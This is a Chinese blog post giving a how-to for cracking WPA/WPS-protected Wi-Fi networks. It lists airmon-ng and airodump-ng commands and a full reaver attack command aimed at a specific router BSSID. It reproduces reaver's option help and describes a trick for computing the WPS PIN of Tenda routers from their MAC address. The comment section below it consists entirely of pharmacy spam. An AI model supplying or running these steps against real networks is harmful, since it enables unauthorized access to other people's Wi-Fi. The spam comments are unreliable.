LSX-blog

Feed Rss

【WPA2 WPA WPS 破解方法】

06.16.2013, 破解, by .

一、打开监听模式

airmon-ng start wlan0

二、抓取要破解的MAC

airodump-ng mon0

二、开始破解决

reaver -i mon0 -b 1C:FA:68:DE:01:14 -N -S -a -c 11 -vv -s /root/1CFA68DE0114.wpc

参数解释

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, –interface=<wlan> Name of the monitor-mode interface to use
-b, –bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, –mac=<mac> MAC of the host system
-e, –essid=<ssid> ESSID of the target AP
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, –out-file=<file> Send output to a log file [stdout]
-s, –session=<file> Restore a previous session file
-C, –exec=<command> Execute the supplied command upon successful pin recovery
-D, –daemonize Daemonize reaver
-a, –auto Auto detect the best advanced options for the target AP
-f, –fixed Disable channel hopping
-5, –5ghz Use 5GHz 802.11 channels
-v, –verbose Display non-critical warnings (-vv for more)
-q, –quiet Only display critical messages
-h, –help Show help

Advanced Options:
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, –delay=<seconds> Set the delay between pin attempts [1]
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, –max-attempts=<num> Quit after num pin attempts
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, –timeout=<seconds> Set the receive timeout period [5]
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, –no-associate Do not associate with the AP (association must be done by another application)
-N, –no-nacks Do not send NACK messages when out of order packets are received
-S, –dh-small Use small DH keys to improve crack speed
-L, –ignore-locks Ignore locked state reported by the target AP
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, –nack Target AP always sends a NACK [Auto]
-w, –win7 Mimic a Windows 7 registrar [False]

注意如果你的路由器腾达的,并且腾达路由前6位MAC地址是C83A35或者00B00C

那么可以直接由软件计算得出PIN。打开系统自带的计算器,把计算器设置成科学型(在查看里设置),先选择十六进制,然后输入腾达路由器mac地址的后六位,再点十进制,出来的数就是腾达路由的前七位pin码,PIN的时候最后一位可以从0开始,到9才一个一个的试总共10个码,就出来PIN码了。

 

【WPA2 WPA WPS 破解方法】 有 13 条回应

  1. why to take viagra

    回复
  2. kanada preiswerter viagra

    回复
  3. viagra vendita on lin

    回复
  4. viagra en los jovene

    回复
  5. price of viagra in cozumel

    回复
  6. buy cialis get viagra free

    回复
  7. pfizer workshops is

    回复
  8. viagra plus chyscorg

    回复
  9. how do i get viagra prescribed

    回复
  10. generisches online viagra

    回复
  11. cheap is 5mg

    05d6 top internet is web sites

    回复

发表评论

电子邮件地址不会被公开。 必填项已用*标注